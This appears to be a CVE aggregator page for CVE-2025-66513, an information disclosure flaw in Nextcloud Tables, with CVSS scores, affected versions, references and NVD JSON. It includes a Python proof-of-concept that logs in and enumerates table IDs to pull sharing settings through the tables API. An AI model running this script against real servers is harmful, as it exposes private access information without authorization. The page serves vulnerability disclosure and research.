CVE-2025-66513

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.9, 0.9.6, and 1.0.1, the information which table (numeric ID) is shared with which groups or users and the respective permissions was not limited to privileged users. This vulnerability is fixed in 0.8.9, 0.9.6, and 1.0.1.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE

Nextcloud Tables < 0.8.9

Nextcloud Tables < 0.9.6

Nextcloud Tables < 1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2025-66513 PoC - Nextcloud Tables Information Disclosure # Target: Nextcloud instance with Tables app installed # This PoC demonstrates how an authenticated user can access # table sharing information without proper authorization TARGET_URL = "https://vulnerable-nextcloud.example.com" USERNAME = "[email protected]" PASSWORD = "password123" def exploit(): """ Exploit for CVE-2025-66513: Information disclosure via unauthorized access to table sharing configuration """ session = requests.Session() # Step 1: Authenticate to Nextcloud login_url = f"{TARGET_URL}/index.php/login" login_data = { "user": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Authentication failed") return print("[+] Authenticated successfully") # Step 2: Enumerate table IDs and fetch sharing information # The vulnerable endpoint exposes table sharing configuration # without proper authorization checks for table_id in range(1, 100): vulnerable_endpoint = f"{TARGET_URL}/ocs/v2.php/apps/tables/api/v1/tables/{table_id}/shares" headers = { "OCS-APIREQUEST": "true", "Accept": "application/json" } response = session.get(vulnerable_endpoint, headers=headers) if response.status_code == 200: try: data = response.json() if data.get("ocs") and data["ocs"].get("data"): shares = data["ocs"]["data"] if shares: print(f"\n[+] Table ID {table_id} sharing info:") print(json.dumps(shares, indent=2)) except json.JSONDecodeError: pass print("\n[!] Information disclosure complete") print("[!] Collected table sharing configurations without authorization") if __name__ == "__main__": exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66513
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66513
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66513/
[4] VulDB https://vuldb.com/cve/CVE-2025-66513
[5] https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2cwj-qp49-4xfw
[6] https://github.com/nextcloud/tables/commit/b92b9560b1e70a02b103a7aeb9e22e2ab5231873
[7] https://github.com/nextcloud/tables/pull/2148
[8] https://hackerone.com/reports/3334165

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66513", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:57.290", "lastModified": "2025-12-09T19:32:45.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.9, 0.9.6, and 1.0.1, the information which table (numeric ID) is shared with which groups or users and the respective permissions was not limited to privileged users. This vulnerability is fixed in 0.8.9, 0.9.6, and 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.8.9", "matchCriteriaId": "660CDECE-2C04-490D-B390-8A8764174EF8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.9.0", "versionEndExcluding": "0.9.6", "matchCriteriaId": "3F92B80C-0013-4D20-8169-5768D304E90C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.1", "matchCriteriaId": "AAC1DF9A-DBB3-41A0-B346-6791477C6EC2"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2cwj-qp49-4xfw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/nextcloud/tables/commit/b92b9560b1e70a02b103a7aeb9e22e2ab5231873", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/tables/pull/2148", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://hackerone.com/reports/3334165", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}